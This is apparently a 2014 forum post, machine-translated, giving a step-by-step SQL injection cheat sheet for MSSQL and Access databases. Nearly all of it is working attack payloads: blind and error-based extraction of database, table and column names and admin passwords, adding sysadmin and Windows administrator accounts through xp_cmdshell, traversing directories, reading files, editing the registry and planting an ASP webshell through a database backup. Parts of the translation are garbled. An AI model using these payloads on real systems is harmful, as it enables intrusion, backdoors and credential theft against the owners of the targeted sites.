1. Determine whether there is an injection
; and 1=1
; and 1=2
2. Preliminary judgment whether it is mssql
; and user>0
3. Judge the database system
; and (select count(*) from sysobjects)>0 mssql
; and (select count(*) from msysobjects)>0 access
4. The injection parameter is a character
'and [query criteria] and ''='
5. There are no filtered parameters during the search
'and [query criteria] and '%25'='
6. Guess the name of the table
; and (select Count(*) from [table name])>0
7. Guess the field
; and (select Count(field name) from table name)>0
8. Guess the length of the record in the field
; and (select top 1 len(field name) from table name)>0
9. (1) Guess the ASCII value of the field (access)
; and (select top 1 asc(mid(field name, 1,1)) from table name)>0
(2) Guess the ASCII value of the field (mssql)
; and (select top 1 unicode(substring(field name,1,1)) from table name)>0
10. Test Permission Structure (mssql)
; and 1=(select IS_SRVROLEMEMBER('sysadmin')); --
; and 1=(select IS_SRVROLEMEMBER('serveradmin')); --
; and 1=(select IS_SRVROLEMEMBER('setupadmin')); --
; and 1=(select IS_SRVROLEMEMBER('securityadmin')); --
; and 1=(select IS_SRVROLEMEMBER('diskadmin')); --
; and 1=(select IS_SRVROLEMEMBER('bulkadmin')); --
; and 1=(select IS_MEMBER('db_owner')); --
11. Add an account for mssql and the system
; exec master.dbo.sp_addlogin username; --
; exec master.dbo.sp_password null,username,password; --
; exec master.dbo.sp_addsrvrolemember sysadmin username; --
; exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'; --
; exec master.dbo.xp_cmdshell 'net user username password /add'; --
; exec master.dbo.xp_cmdshell 'net localgroup administrators username /add'; --
12. (1) Traverse the catalog
; create table dirs(paths varchar(100), id int)
; insert dirs exec master.dbo.xp_dirtree 'c:\'
; and (select top 1 paths from dirs)>0
; and (select top 1 paths from dirs where paths not in('paths obtained from the previous step'))>)
(2) Traverse the catalog
; create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255)); --
; insert temp exec master.dbo.xp_availablemedia; -- Get all current drives
; insert into temp(id) exec master.dbo.xp_subdirs 'c:\'; -- Get a list of subdirectories
; insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\'; -- Get the directory tree structure for all subdirectories
; insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp'; -- View the contents of the file
13. Stored procedures in mssql
xp_regenumvalues Registry root key, child key
; exec xp_regenumvalues 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run' returns all key values in multiple record sets
xp_regread Root key, child key, key-value name
; exec xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' returns the value of the set key
xp_regwrite Root key, child key, value name, value type, value
There are two types of value types REG_SZ REG_DWORD for character types, and for integers
; exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestvalueName','reg_sz', 'hello' to the registry
xp_regdeletevalue Root key, sub-key, value name
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows\CurrentVersion', 'TestvalueName' to remove a value
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' to remove the key, including all values under that key
14. mssql backup creates a webshell
use model
create table cmd(str image);
insert into cmd(str) values ('<% Dim oScript %>');
backup database model to disk='c:\l.asp';
15. mssql built-in functions
; and (select @@version)>0 to get the version number of Windows
; and user_name()='dbo' to determine whether the connected user of the current system is SA
; and (select user_name())>0 Exploded the connected users of the current system
; and (select db_name())>0 to get the currently connected database
MSSQL hand-annotated database violation
1. Expose the current table name and column name
Submit "'having 1=1--" after the injection point to get the return message in English, in which you can see a table name and a column name. Submit "group by the list name having 1=1--" to get another column name; Continue to submit "group by the list of the exposed table name, the name of the exposed table. The second column name has 1=1--", which gives you another column name. Commit in the same way until the page no longer returns error messages to get all the column names. Trivia: Violent table names and column names are used in combination with GROUP BY in SQL statements to make conditional judgments. Because the statement is incomplete, the database returns an error message and displays a table name and a column name. The basic method can only expose the current table in the database, and if a table contains a lot of column names, it is very difficult to use the basic method.
First. All database names are exposed
Use the statement "and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])" to expose arbitrary table names and column names in the database, where "[N]" represents the Nth table in the database.
Step 1: After injecting the point, submit the following statement: "and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=12)", because the value of dbid is from 1 to 5, which is used by the system, so the user must have built it from 6, and we submitted the name>1, the name field is a character type field, and the number comparison will be wrong, so after submission, IE will return the following information: "Microsoft OLE DB Provider for ODBC Drivers error ?e07' [Microsoft][ODBC SQL Server Driver][SQL Server] converts nvarchar value 'Northwind' to data type int column. In this way, the value of the name field is exposed, that is, we get a database name "Northwind". Changing the value of "dbid" can get all the database names.
and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=[N])-- Modify N to explode all database names from 6
Second. Expose all table names in the specified database
After getting the database name, now you need to get all the table names in the library, submit the following statement: "and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U')", here is the table name in the master database, and the SQL statement of the query returns the value of name, and then compare it with the number 0, so that the value of name will be exposed. After submitting, the name of the table was "'spt_monito" was exposed.
Then the other tables are exposed, and the following statement is submitted: "and 0<>(select top 1 name from master.dbo.sysobjects where xtype='U' and name not in('spt_monito'))", and another table named "cd512" is exposed. File "and name not in(' spt_monito',' CD512',..))" You can find out all the table names.
and 0<>(select top 1 name from [specify database name].dbo.sysobjects where xtype='U')--
and 0<>(select top 1 name from [specify database name].dbo.sysobjects where xtype='U' and name not in('[Exploded table name]'))--
and 0<>(select top 1 name from [specify database name].dbo.sysobjects where xtype='U' and name not in('[Explosive table name]', '[Exploded second table name]')))--
4. Expose all column names in the specified table
and 0<>(select count(*) from bbs.dbo.sysobjects where xtype='U' and name='admin' and uid>(str(id)))
Convert the ID value to a character type and then compare it with an integer value. The ID number is out. The value is: 949578421 name='table name'
and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421)-- A field name in the admin table is exposed
Resubmit and 0<>(select top 1 name from wutong.dbo.syscolumns where id=949578421 and name not in('adduser')))--
File "and name not in(' spt_monito',' CD512',..))" You can find all the field names in the admin table.
and 0<>(select count(*) from [specify database name].dbo.sysobjects where xtype='U' and name='[Table name of field to be exploded]' and uid>(str(id)))--The ID value of the table name of the field to be exploded
and 0<>(select top 1 name from [specify database name].dbo.syscolumns where id=exploded id value)-- The name of a field in the exploding id value table
and 0<>(select top 1 name from [specify database name].dbo.syscolumns where id=Explosive id value and name not in('[Exploded field name]')))--
5. Read the data in the specified table
and 0<(select A_ID from wutong.dbo.admin where A_UserID>1) -- the content that broke A_PWD
and 0<(select [a field that exists] from [specify database name].dbo.[table name to query] where [field name to explode content]>1)--
and 0<(select A_ID from wutong.dbo.admin where A_PWD>1 and A_UserID='admin')-- The password of the admin is exposed
and 0<(Select Top 1 A_UserID FROM admin where A_ID<>1)-- The administrator name of id<>1 (fuhao)
and 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao')-- The name of the second admin <> not equal to (tuiguang)
and 0<(Select Top 1 A_UserID FROM admin where A_ID <>1 and A_UserID <> 'fuhao'and A_UserID <> 'tuiguang')--
After knowing the table name and column name of the database, you can use the "query statement" to read any information in the database. For example, if you want to read the Nth data in a column in a table, you can submit the statement: "and (Select Top 1 column name FROM table name where id=[N])>1" ([N] represents the Nth data in the column), and you can know the desired data from the information returned by IE.
|
Posted on 11/22/2014 5:17:21 PM
|
|
|
